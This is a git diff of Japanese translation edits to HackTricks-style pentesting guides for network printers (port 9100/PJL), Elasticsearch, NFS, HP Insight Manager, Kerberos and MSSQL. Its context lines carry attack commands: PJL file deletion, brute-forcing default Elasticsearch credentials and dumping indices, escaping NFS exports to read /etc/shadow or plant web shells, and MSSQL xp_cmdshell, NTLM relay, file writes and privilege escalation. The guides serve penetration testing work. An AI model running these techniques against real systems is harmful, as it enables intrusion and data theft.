+[こちら](http://hacking-printers.net/wiki/index.php/Port_9100_printing)から: 生印刷とは、ネットワークプリンターのポート9100/tcpに接続するプロセスを定義します。これは、CUPSおよびWindows印刷アーキテクチャがネットワークプリンターと通信するために使用するデフォルトの方法であり、'_プリンターに使用される最もシンプルで、最も速く、一般的に最も信頼性の高いネットワークプロトコル_'と見なされています。生ポート9100印刷は、JetDirect、AppSocket、またはPDLデータストリームとも呼ばれ、実際には**印刷プロトコルそのものではありません**。代わりに、**送信されるすべてのデータは印刷デバイスによって直接処理されます**。これは、TCP経由の並列接続のように動作します。LPD、IPP、SMBとは対照的に、これはクライアントに直接フィードバックを送信でき、ステータスやエラーメッセージを含みます。このような**双方向チャネル**は、**PJL**、**PostScript**、または**PCL**コマンドの**結果**に直接**アクセス**を提供します。したがって、ほぼすべてのネットワークプリンターでサポートされている生ポート9100印刷は、PRETおよびPFTを使用したセキュリティ分析のためのチャネルとして使用されます。
 
-If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page).
+[**プリンターのハッキングについてもっと学びたい場合は、このページを読んでください**](http://hacking-printers.net/wiki/index.php/Main_Page)。
 
 **デフォルトポート:** 9100
 ```
 9100/tcp open  jetdirect
 ```
-# 列挙
+## 列挙
 
-## 手動
+### 手動
 ```bash
 nc -vn  9100
 @PJL INFO STATUS      #CODE=40000   DISPLAY="Sleep"   ONLINE=TRUE
@@ -29,7 +31,7 @@ nc -vn  9100
 @PJL FSDOWNLOAD       #Useful to download a file
 @PJL FSDELETE         #Useful to delete a file
 ```
-## 自動
+### 自動
 ```bash
 nmap -sV --script pjl-ready-message -p  
 ```
@@ -46,13 +48,13 @@ msf> use auxiliary/scanner/printer/printer_delete_file
 ```
 ## プリンターハッキングツール
 
-これはプリンターを悪用するために使用するツールです:
+これはプリンターを悪用するために使用したいツールです:
 
 {{#ref}}
 https://github.com/RUB-NDS/PRET
 {{#endref}}
 
-# **Shodan**
+## **Shodan**
 
 - `pjl port:9100`
 
diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md
index d45b41cd6..f20ea10c6 100644
--- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md
+++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-Elasticsearchは、**分散型**、**オープンソース**の検索および分析エンジンで、**あらゆる種類のデータ**に対応しています。**速度**、**スケーラビリティ**、および**シンプルなREST API**で知られています。Apache Luceneの上に構築され、2010年にElasticsearch N.V.(現在のElastic)によって最初にリリースされました。Elasticsearchは、データの取り込み、強化、保存、分析、視覚化のためのオープンソースツールのコレクションであるElastic Stackのコアコンポーネントです。このスタックは一般にELK Stackと呼ばれ、LogstashやKibanaも含まれ、現在はBeatsと呼ばれる軽量データ送信エージェントがあります。
+Elasticsearchは、**分散型**、**オープンソース**の検索および分析エンジンで、**あらゆる種類のデータ**に対応しています。その**速度**、**スケーラビリティ**、および**シンプルなREST API**で知られています。Apache Luceneの上に構築され、2010年にElasticsearch N.V.(現在のElastic)によって最初にリリースされました。Elasticsearchは、データの取り込み、強化、保存、分析、視覚化のためのオープンソースツールのコレクションであるElastic Stackのコアコンポーネントです。このスタックは一般にELK Stackと呼ばれ、LogstashやKibanaも含まれ、現在はBeatsと呼ばれる軽量データ送信エージェントがあります。
 
 ### Elasticsearchインデックスとは?
 
@@ -12,7 +12,7 @@ Elasticsearchの**インデックス**は、**関連するドキュメント**
 
 Elasticsearchは、効率的なデータ構造である**逆インデックス**を使用して、高速な全文検索を実現しています。このインデックスは、ドキュメント内のすべてのユニークな単語をリストし、各単語が出現するドキュメントを特定します。
 
-インデックス作成プロセス中に、Elasticsearchはドキュメントを保存し、逆インデックスを構築して、ほぼリアルタイムの検索を可能にします。**インデックスAPI**は、特定のインデックス内のJSONドキュメントを追加または更新するために使用されます。
+インデックス作成プロセス中に、Elasticsearchはドキュメントを保存し、逆インデックスを構築し、ほぼリアルタイムでの検索を可能にします。**インデックスAPI**は、特定のインデックス内のJSONドキュメントを追加または更新するために使用されます。
 
 **デフォルトポート**: 9200/tcp
 
@@ -39,7 +39,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
 ```bash
 {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
 ```
-それは、認証が設定されており、**有効な資格情報**が必要であることを意味します。これにより、elasticsearchから情報を取得できます。その後、[**ブルートフォースを試すことができます**](../generic-hacking/brute-force.md#elasticsearch)(HTTP基本認証を使用しているため、BF HTTP基本認証を使用できるものは何でも使用できます)。\
+それは、認証が設定されており、**有効な資格情報**が必要であることを意味します。Elasticsearchから情報を取得するには、[**ブルートフォースを試す**](../generic-hacking/brute-force.md#elasticsearch)ことができます(HTTP基本認証を使用しているため、HTTP基本認証をブルートフォースするためのものは何でも使用できます)。\
 ここに**デフォルトのユーザー名のリスト**があります:_**elastic**(スーパーユーザー)、remote_monitoring_user、beats_system、logstash_system、kibana、kibana_system、apm_system、_ \_anonymous\_。_ Elasticsearchの古いバージョンでは、このユーザーのデフォルトパスワードは**changeme**です。
 ```
 curl -X GET http://user:password@IP:9200/
@@ -57,7 +57,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/"
 ```
 ### Elastic Info
 
-以下は、elasticsearchに関する情報を**取得するために**、**GET**を介して**アクセスできる**エンドポイントです:
+以下は、elasticsearchに関する情報を**取得するためにGET経由でアクセスできる**エンドポイントです:
 
 | \_cat                          | /\_cluster                    | /\_security              |
 | ------------------------------ | ----------------------------- | ------------------------ |
@@ -86,14 +86,14 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/"
 | /\_cat/nodeattrs               |                               |                          |
 | /\_cat/nodes                   |                               |                          |
 
-これらのエンドポイントは、[**ドキュメントから取得されたものです**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) さらに詳しい情報を**見つけることができます**。\
-また、`/_cat`にアクセスすると、レスポンスにはインスタンスがサポートする`/_cat/*`エンドポイントが含まれます。
+これらのエンドポイントは、[**ドキュメントから取得された**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html)もので、**詳細を見つけることができます**。\
+また、`/_cat`にアクセスすると、インスタンスがサポートする`/_cat/*`エンドポイントが含まれたレスポンスが返されます。
 
-`/_security/user`(認証が有効な場合)では、どのユーザーが`superuser`の役割を持っているかを確認できます。
+`/_security/user`(認証が有効な場合)では、どのユーザーが`superuser`の役割を持っているかを見ることができます。
 
 ### Indices
 
-`http://10.10.10.115:9200/_cat/indices?v`にアクセスすることで、**すべてのインデックスを収集**できます。
+`http://10.10.10.115:9200/_cat/indices?v`にアクセスすることで、**すべてのインデックスを収集する**ことができます。
 ```
 health status index   uuid                   pri rep docs.count docs.deleted store.size pri.store.size
 green  open   .kibana 6tjAYZrgQ5CwwR0g6VOoRg   1   0          1            0        4kb            4kb
@@ -106,36 +106,36 @@ yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0
 
 ### インデックスのダンプ
 
-インデックスの**すべての内容をダンプしたい場合**は、`http://host:9200//_search?pretty=true`にアクセスできます。例えば、`http://10.10.10.115:9200/bank/_search?pretty=true`のように。
+インデックスの**すべての内容をダンプしたい場合**、`http://host:9200//_search?pretty=true`にアクセスできます。例えば、`http://10.10.10.115:9200/bank/_search?pretty=true`です。
 
 ![](<../images/image (914).png>)
 
 _この時点で、銀行インデックス内の各ドキュメント(エントリ)の内容と、前のセクションで見たこのインデックスのフィールドを比較してみてください。_
 
 ここで、**"hits"内に"total"というフィールドがあり、**このインデックス内に**1000のドキュメントが見つかった**ことを示していることに気付くかもしれませんが、実際に取得されたのは10件だけです。これは、**デフォルトで10件のドキュメントに制限があるためです。**\
-しかし、**このインデックスに1000のドキュメントが含まれていることがわかったので、**ダンプしたいエントリの数を**`size`**パラメータで指定して、**すべてをダンプできます**:`http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\
+しかし、**このインデックスに1000のドキュメントが含まれていることがわかったので、**ダンプしたいエントリの数を**`size`**パラメータで指定して、**すべてをダンプできます**:`http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`\
 \_注:より大きな数を指定すると、すべてのエントリがダンプされます。例えば、`size=9999`と指定すると、エントリがもっとあった場合は奇妙になります(ただし、確認する必要があります)。_
 
 ### すべてをダンプ
 
-すべてをダンプするには、**以前と同じパスに行きますが、インデックスを指定せずに**`http://host:9200/_search?pretty=true`にアクセスします。例えば、`http://10.10.10.115:9200/_search?pretty=true`のように。\
-この場合、**デフォルトの10件の制限**が適用されることを忘れないでください。`size`パラメータを使用して、**より多くの結果をダンプ**できます。詳細については前のセクションを参照してください。
+すべてをダンプするには、**以前と同じパスに行きますが、インデックスを指定せずに**`http://host:9200/_search?pretty=true`にアクセスします。例えば、`http://10.10.10.115:9200/_search?pretty=true`です。\
+この場合、**デフォルトの10件の制限**が適用されることを忘れないでください。`size`パラメータを使用して、**より多くの結果をダンプできます**。詳細については前のセクションをお読みください。
 
 ### 検索
 
-情報を探している場合は、すべてのインデックスで**生の検索を行うことができます**。`http://host:9200/_search?pretty=true&q=`にアクセスします。例えば、`http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`のように。
+情報を探している場合は、すべてのインデックスで**生の検索を行うことができます**。`http://host:9200/_search?pretty=true&q=`にアクセスします。例えば、`http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`です。
 
 ![](<../images/image (335).png>)
 
-特定のインデックスで**検索したい場合は**、**パス**にそれを**指定**するだけです:`http://host:9200//_search?pretty=true&q=`
+特定のインデックス内で**検索したい場合は**、**パス**にそれを**指定**するだけです:`http://host:9200//_search?pretty=true&q=`
 
 _qパラメータは、コンテンツを検索するために**正規表現をサポートしています**。_
 
-また、Elasticsearchサービスをファズするために、[https://github.com/misalabs/horuz](https://github.com/misalabs/horuz)のようなものを使用することもできます。
+また、[https://github.com/misalabs/horuz](https://github.com/misalabs/horuz)のようなものを使用して、elasticsearchサービスをファズすることもできます。
 
 ### 書き込み権限
 
-新しいインデックス内に新しいドキュメントを作成しようとして、次のようなコマンドを実行することで、書き込み権限を確認できます。
+新しいインデックス内に新しいドキュメントを作成しようとして、書き込み権限を確認できます。次のようなコマンドを実行します:
 ```bash
 curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/json' -d'
 {
diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md
index 3d1add7cc..a5c6d3591 100644
--- a/src/network-services-pentesting/nfs-service-pentesting.md
+++ b/src/network-services-pentesting/nfs-service-pentesting.md
@@ -4,7 +4,7 @@
 
 ## **基本情報**
 
-**NFS**は、ユーザーがネットワーク上のファイルにローカルディレクトリ内にあるかのようにシームレスにアクセスできるように設計された**クライアント/サーバ**システムです。
+**NFS**は、ユーザーがネットワーク上でファイルにシームレスにアクセスできるように設計された**クライアント/サーバ**システムであり、これらのファイルがローカルディレクトリ内にあるかのように扱います。
 
 **デフォルトポート**: 2049/TCP/UDP(バージョン4を除く、TCPまたはUDPのみが必要です)。
 ```
@@ -14,7 +14,7 @@
 
 このプロトコルの注目すべき点は、通常、組み込みの**認証**や**認可メカニズム**が欠如していることです。代わりに、認可は**ファイルシステム情報**に依存し、サーバーは**クライアント提供のユーザー情報**をファイルシステムが要求する**認可形式**に正確に変換する役割を担っています。主に**UNIX構文**に従います。
 
-認証は一般的に**UNIX `UID`/`GID`識別子とグループメンバーシップ**に依存しています。しかし、クライアントとサーバー間の**`UID`/`GID`マッピング**の不一致が生じるため、サーバーによる追加の検証の余地がありません。さらに、これらの詳細はクライアントによって送信され、サーバーによって信頼されるため、悪意のあるクライアントがより特権のある`uid`や`gid`を送信して他のユーザーを**なりすます**可能性があります。
+認証は一般的に**UNIX `UID`/`GID`識別子とグループメンバーシップ**に依存しています。しかし、クライアントとサーバー間の**`UID`/`GID`マッピング**の不一致により、サーバーによる追加の検証が行えないという課題が生じます。さらに、これらの詳細はクライアントによって送信され、サーバーによって信頼されるため、悪意のあるクライアントがより特権のある`uid`や`gid`を送信して他のユーザーを**なりすます**可能性があります。
 
 **ただし、デフォルトではNFSを使用して`UID` 0(root)をなりすますことはできません。これについてはスカッシングセクションで詳しく説明します。**
 
@@ -29,26 +29,26 @@ As you can see, it allows to configure a specific **IP** or **hostname** to acce
 
 ### Versions
 
-- **NFSv2**: このバージョンは、さまざまなシステムとの広範な互換性で認識されており、主にUDP上での初期操作によってその重要性を示しています。このシリーズで最も**古い**ものであり、将来の開発の基礎を築きました。
+- **NFSv2**: このバージョンは、さまざまなシステムとの広範な互換性で認識されており、主にUDP上での初期操作によってその重要性を示しています。このシリーズの**最古**のものであり、将来の開発の基礎を築きました。
 
-- **NFSv3**: 一連の改善と共に導入され、NFSv3は前のバージョンを拡張し、可変ファイルサイズをサポートし、エラーレポート機能を改善しました。進歩にもかかわらず、NFSv2クライアントとの完全な後方互換性には制限がありました。
+- **NFSv3**: 一連の改善と共に導入されたNFSv3は、前のバージョンを拡張し、可変ファイルサイズをサポートし、改善されたエラーレポート機能を提供しました。進歩にもかかわらず、NFSv2クライアントとの完全な後方互換性には制限がありました。
 
 - **NFSv4**: NFSシリーズの画期的なバージョンであるNFSv4は、ネットワーク全体でのファイル共有を現代化するために設計された機能のスイートをもたらしました。注目すべき改善点には、**高セキュリティ**のためのKerberosの統合、ファイアウォールを越えて動作し、ポートマッパーなしでインターネット上で動作する能力、アクセス制御リスト(ACL)のサポート、状態ベースの操作の導入が含まれます。そのパフォーマンスの向上と状態を持つプロトコルの採用により、NFSv4はネットワークファイル共有技術における重要な進展として際立っています。
-- LinuxホストでNFSがkerberos認証をサポートしているのを見つけるのは非常に奇妙です。
+- LinuxホストでKerberos認証をサポートするNFSを見つけるのは非常に奇妙です。
 
-各NFSバージョンは、ネットワーク環境の進化するニーズに対応することを目的として開発されており、セキュリティ、互換性、パフォーマンスを徐々に向上させています。
+各NFSバージョンは、ネットワーク環境の進化するニーズに対応する意図で開発されており、セキュリティ、互換性、パフォーマンスを徐々に向上させています。
 
 ### Squashing
 
-前述のように、NFSは通常、クライアントの`uid`と`gid`を信頼してファイルにアクセスします(kerberosが使用されていない場合)。ただし、サーバーで**この動作を変更する**ために設定できるいくつかの構成があります:
+前述のように、NFSは通常、クライアントの`uid`と`gid`を信頼してファイルにアクセスします(Kerberosが使用されていない場合)。ただし、この動作を**変更する**ためにサーバーで設定できるいくつかの構成があります:
 
-- **all_squash**: すべてのアクセスを圧縮し、すべてのユーザーとグループを**`nobody`**(65534 unsigned / -2 signed)にマッピングします。したがって、すべての人が`nobody`であり、ユーザーは使用されません。
-- **root_squash/no_all_squash**: これはLinuxのデフォルトであり、**uid 0(root)でのアクセスのみを圧縮します**。したがって、任意の`UID`と`GID`は信頼されますが、`0`は`nobody`に圧縮されるため、rootの偽装は不可能です。
+- **all_squash**: すべてのアクセスを圧縮し、すべてのユーザーとグループを**`nobody`**(65534 unsigned / -2 signed)にマッピングします。したがって、すべての人が`nobody`となり、ユーザーは使用されません。
+- **root_squash/no_all_squash**: これはLinuxのデフォルトであり、**uid 0(root)のアクセスのみを圧縮します**。したがって、任意の`UID`と`GID`は信頼されますが、`0`は`nobody`に圧縮されるため、rootの偽装は不可能です。
 - **no_root_squash**: この構成が有効になっている場合、rootユーザーさえも圧縮されません。これは、この構成でディレクトリをマウントすると、rootとしてアクセスできることを意味します。
 
 ### Subtree check
 
-Linuxでのみ利用可能です。man(5) exportsは次のように述べています:「ファイルシステムのサブディレクトリがエクスポートされているが、全体のファイルシステムがエクスポートされていない場合、NFSリクエストが到着するたびに、サーバーはアクセスされたファイルが適切なファイルシステムにあること(これは簡単です)だけでなく、エクスポートされたツリーにあることも確認する必要があります(これは難しいです)。このチェックはサブツリーのチェックと呼ばれます。」
+Linuxでのみ利用可能です。man(5) exportsは次のように述べています:「ファイルシステムのサブディレクトリがエクスポートされているが、全体のファイルシステムがエクスポートされていない場合、NFSリクエストが到着するたびに、サーバーはアクセスされたファイルが適切なファイルシステムにあることを確認するだけでなく、それがエクスポートされたツリーにあることも確認しなければなりません(これは難しい)。このチェックはサブツリーのチェックと呼ばれます。」
 
 Linuxでは、**`subtree_check`機能はデフォルトで無効**になっています。
 
@@ -56,7 +56,7 @@ Linuxでは、**`subtree_check`機能はデフォルトで無効**になって
 
 ### Showmount
 
-これは、**NFSv3サーバーから情報を取得する**ために使用できます。たとえば、**エクスポート**のリスト、これらのエクスポートに**アクセスを許可されている**ユーザー、接続されているクライアント(クライアントがサーバーに通知せずに切断した場合、正確でない可能性があります)などです。
+これは、**NFSv3サーバーから情報を取得する**ために使用できます。たとえば、**エクスポート**のリスト、これらのエクスポートに**アクセスを許可されている**人、接続されているクライアント(クライアントがサーバーに通知せずに切断した場合、正確でない可能性があります)などです。
 **NFSv4クライアントは直接/ exportにアクセスし、そこからエクスポートにアクセスしようとします。無効または認可されていない理由で失敗します。**
 
 `showmount`やMetasploitモジュールのようなツールがNFSポートから情報を表示しない場合、それはバージョン3をサポートしていないNFSv4サーバーの可能性があります。
@@ -75,19 +75,19 @@ scanner/nfs/nfsmount #Scan NFS mounts and list permissions
 ```
 ### nfs_analyze
 
-このツールは [https://github.com/hvs-consulting/nfs-security-tooling](https://github.com/hvs-consulting/nfs-security-tooling) から取得でき、NFSサーバーから**マウント**、サポートされているNFSバージョン、接続されたIP、さらには**エクスポートから他のフォルダーにエスケープできるか**や**`no_root_squash`が有効か**を確認するための多くのデータを取得するために使用できます。
+このツールは [https://github.com/hvs-consulting/nfs-security-tooling](https://github.com/hvs-consulting/nfs-security-tooling) から取得でき、NFSサーバーから**マウント**、サポートされているNFSバージョン、接続されたIP、さらには**エクスポートから他のフォルダーにエスケープできるか**や**`no_root_squash`が有効か**どうかなど、多くのデータを取得するために使用できます。
 
 ## Mounting
 
-サーバーが**マウント**するために**どのフォルダー**が**利用可能**かを知るには、次のように尋ねることができます:
+サーバーが**マウント可能**な**フォルダー**を知るには、次のように尋ねることができます:
 ```bash
 showmount -e 
 ```
-次に、次のようにマウントします:
+次に、次のコマンドを使用してマウントします:
 ```bash
 mount -t nfs [-o vers=2] :  -o nolock
 ```
-**バージョン2を使用する**ことを指定する必要があります。なぜなら、それには**認証**や**承認**が**ない**からです。
+**バージョン2を使用する**ことを指定する必要があります。なぜなら、それには**認証**や**認可**が**ない**からです。
 
 **例:**
 ```bash
@@ -96,7 +96,7 @@ mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
 ```
 ## 攻撃
 
-### UIDとGIDの信頼
+### UIDとGIDを信頼する
 
 もちろん、ここでの唯一の問題は、デフォルトではroot(`UID` 0)を偽装することができないことです。しかし、他のユーザーを偽装することは可能であり、`no_root_squash`が有効になっている場合はrootを偽装することもできます。
 
@@ -115,11 +115,11 @@ mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
 
 この[素晴らしい記事](https://www.hvs-consulting.de/en/nfs-security-identifying-and-exploiting-misconfigurations/)では、**エクスポートから脱出してファイルシステム内の他のフォルダーにアクセスする**ことが可能であることが示されています。
 
-したがって、エクスポートが**全体のファイルシステム**の**サブフォルダー**をエクスポートしている場合、**`subtree_check`**が無効になっていると、エクスポートの外部にあるファイルにアクセスすることが可能です。そして、これは**Linuxではデフォルトで無効**になっています。
+したがって、エクスポートが**ファイルシステム全体**の**サブフォルダー**をエクスポートしている場合、**`subtree_check`**が無効になっていると、エクスポートの外部にあるファイルにアクセスすることが可能です。そして、これは**Linuxではデフォルトで無効**になっています。
 
 例えば、NFSサーバーが`/srv/`をエクスポートしていて、`/var/`が同じファイルシステムにある場合、`/var/log/`からログを読み取ったり、`/var/www/`にウェブシェルを保存したりすることが可能です。
 
-さらに、デフォルトではroot(0)ユーザーのみが偽装から保護されていることに注意してください(Squashセクションを確認)。ただし、ファイルが**rootによって所有されているがグループが0でない場合、アクセスすることが可能です**。例えば、ファイル`/etc/shadow`はrootによって所有されていますが、グループは`shadow`(Debianではgid 42)です。したがって、デフォルトで読み取ることが可能です!
+さらに、デフォルトではroot(0)ユーザーのみが偽装から保護されています(スカッシュセクションを確認してください)。しかし、ファイルが**rootによって所有されているがグループが0でない場合、アクセスすることが可能です**。例えば、ファイル`/etc/shadow`はrootによって所有されていますが、グループは`shadow`(Debianではgid 42)です。したがって、デフォルトで読み取ることが可能です!
 
 [https://github.com/hvs-consulting/nfs-security-tooling](https://github.com/hvs-consulting/nfs-security-tooling)のツール**`nfs_analyze`**は、ファイルシステムext4、xfs、btrfsに対するこの攻撃をサポートするために構築されています(v4でも可能であるべきです)。
 
diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
index 91e687d2e..93a31e151 100644
--- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
+++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
@@ -1,14 +1,17 @@
+# # 2301/tcp - Compaq/HP Insight Managerのペンテスト
+
 {{#include ../banners/hacktricks-training.md}}
 
 **デフォルトポート:** 2301,2381
 
-# **デフォルトパスワード**
+## デフォルトパスワード
+
 
 {{#ref}}
 http://www.vulnerabilityassessment.co.uk/passwordsC.htm
 {{#endref}}
 
-# 設定ファイル
+## 設定ファイル
 ```text
 path.properties
 mx.log
diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md
index 446ba72b1..636b25c9c 100644
--- a/src/network-services-pentesting/pentesting-kerberos-88/README.md
+++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md
@@ -25,7 +25,7 @@ PORT   STATE SERVICE
 
 ### MS14-068
 
-MS14-068の脆弱性により、攻撃者は正当なユーザーのKerberosログイントークンを改ざんし、ドメイン管理者であるかのように偽の特権を主張することができます。この偽の主張はドメインコントローラーによって誤って検証され、Active Directoryフォレスト全体のネットワークリソースへの不正アクセスを可能にします。
+MS14-068の脆弱性により、攻撃者は正当なユーザーのKerberosログイントークンを改ざんし、ドメイン管理者であるかのように偽って特権を主張することができます。この偽の主張はドメインコントローラーによって誤って検証され、Active Directoryフォレスト全体のネットワークリソースへの不正アクセスを可能にします。
 
 {{#ref}}
 https://adsecurity.org/?p=541
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index 56418d520..d85f99d3d 100644
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -6,7 +6,7 @@
 
 From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
 
-> **Microsoft SQL Server** は、Microsoft によって開発された **リレーショナルデータベース** 管理システムです。データベースサーバーとして、主な機能は、他のソフトウェアアプリケーションから要求されたデータを保存および取得することです。これらのアプリケーションは、同じコンピュータ上またはネットワーク(インターネットを含む)上の別のコンピュータで実行される場合があります。
+> **Microsoft SQL Server** は **リレーショナルデータベース** 管理システムで、Microsoft によって開発されました。データベースサーバーとして、主な機能は、他のソフトウェアアプリケーションから要求されたデータを保存および取得することです。これらのアプリケーションは、同じコンピュータ上またはネットワーク(インターネットを含む)上の別のコンピュータ上で実行される場合があります。
 
 **デフォルトポート:** 1433
 ```
@@ -15,8 +15,8 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
 ### **デフォルトのMS-SQLシステムテーブル**
 
 - **master Database**: このデータベースは、SQL Serverインスタンスのすべてのシステムレベルの詳細をキャプチャするため、重要です。
-- **msdb Database**: SQL Server Agentは、このデータベースを使用してアラートやジョブのスケジューリングを管理します。
-- **model Database**: SQL Serverインスタンス上の新しいデータベースの雛形として機能し、サイズ、照合、リカバリモデルなどの変更が新しく作成されたデータベースに反映されます。
+- **msdb Database**: SQL Server Agentは、このデータベースを使用してアラートとジョブのスケジューリングを管理します。
+- **model Database**: SQL Serverインスタンス上のすべての新しいデータベースの青写真として機能し、サイズ、照合、リカバリモデルなどの変更が新しく作成されたデータベースに反映されます。
 - **Resource Database**: SQL Serverに付属するシステムオブジェクトを格納する読み取り専用データベースです。これらのオブジェクトは物理的にはResourceデータベースに保存されていますが、論理的にはすべてのデータベースのsysスキーマに表示されます。
 - **tempdb Database**: 一時的なオブジェクトや中間結果セットのための一時ストレージエリアとして機能します。
 
@@ -29,7 +29,7 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
 nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 
 msf> use auxiliary/scanner/mssql/mssql_ping
 ```
-> [!NOTE]
+> [!TIP]
 > もし**資格情報**が**ない**場合は、推測してみることができます。nmapやmetasploitを使用できます。注意してください、既存のユーザー名を使用して何度もログインに失敗すると、**アカウントをブロック**する可能性があります。
 
 #### Metasploit (資格情報が必要)
@@ -131,6 +131,7 @@ use_link [NAME]
 ```
 #### ユーザーを取得
 
+
 {{#ref}}
 types-of-mssql-users.md
 {{#endref}}
@@ -155,9 +156,9 @@ SELECT * FROM sysusers
 ```
 #### 権限の取得
 
-1. **Securable:** SQL Serverによってアクセス制御のために管理されるリソースとして定義されます。これらは以下のカテゴリに分類されます:
-- **Server** – 例としてデータベース、ログイン、エンドポイント、可用性グループ、サーバーロールなどがあります。
-- **Database** – 例としてデータベースロール、アプリケーションロール、スキーマ、証明書、全文検索カタログ、ユーザーなどが含まれます。
+1. **Securable:** SQL Serverによってアクセス制御のために管理されるリソースとして定義されます。これらは以下のように分類されます:
+- **Server** – データベース、ログイン、エンドポイント、可用性グループ、サーバーロールなどの例があります。
+- **Database** – データベースロール、アプリケーションロール、スキーマ、証明書、全文検索カタログ、ユーザーなどの例が含まれます。
 - **Schema** – テーブル、ビュー、プロシージャ、関数、同義語などが含まれます。
 2. **Permission:** SQL Serverのセキュアブルに関連付けられた権限で、ALTER、CONTROL、CREATEなどが主体に付与されることがあります。権限の管理は2つのレベルで行われます:
 - **Server Level** ログインを使用
@@ -187,7 +188,7 @@ EXEC sp_helprotect 'xp_cmdshell'
 ### OSコマンドの実行
 
 > [!CAUTION]
-> コマンドを実行するためには、**`xp_cmdshell`** が**有効**であるだけでなく、**`xp_cmdshell` ストアドプロシージャに対するEXECUTE権限**も必要です。誰が(sysadminを除く)**`xp_cmdshell`**を使用できるかは、次のコマンドで確認できます:
+> コマンドを実行するには、**`xp_cmdshell`** が **有効** であるだけでなく、**`xp_cmdshell` ストアドプロシージャに対する EXECUTE 権限** も必要です。誰が(sysadminを除く)**`xp_cmdshell`** を使用できるかは、次のコマンドで確認できます:
 >
 > ```sql
 > Use master
@@ -274,7 +275,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25
 > ```
 
 **responder**や**Inveigh**などのツールを使用すると、**NetNTLMハッシュを盗む**ことが可能です。\
-これらのツールの使用方法は次のリンクで確認できます:
+これらのツールの使用方法は以下で確認できます:
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -290,7 +291,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25
 
 ### **ファイルの書き込み**
 
-`MSSQL`を使用してファイルを書くには、**[**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option)**を有効にする必要があり、これは管理者権限を必要とし、その後ファイルを作成するためにいくつかのストアドプロシージャを実行します:
+`MSSQL`を使用してファイルを書き込むには、[**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option)を**有効にする必要があり**、これは管理者権限を必要とし、その後ファイルを作成するためにいくつかのストアドプロシージャを実行します:
 ```bash
 # Enable Ole Automation Procedures
 sp_configure 'show advanced options', 1
@@ -308,9 +309,9 @@ EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, ' use auxiliary/admin/mssql/mssql_escalate_dbowner
 ```
-または**PS**スクリプト:
+または **PS** スクリプト:
 ```bash
 # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
 Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
@@ -488,7 +489,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
 ```
 ### 他のユーザーのなりすまし
 
-SQL Serverには、**`IMPERSONATE`**という特別な権限があり、**実行中のユーザーが別のユーザー**またはログインの権限を引き継ぐことを**許可します**。これは、コンテキストがリセットされるか、セッションが終了するまで続きます。
+SQL Serverには、**`IMPERSONATE`**という特別な権限があり、**実行中のユーザーが別のユーザー**またはログインの権限を取得できるようにします。これは、コンテキストがリセットされるか、セッションが終了するまで有効です。
 ```sql
 # Find users you can impersonate
 SELECT distinct b.name
@@ -508,10 +509,10 @@ enum_links
 # If there is a link of interest, re-run the above steps on each link
 use_link [NAME]
 ```
-> [!NOTE]
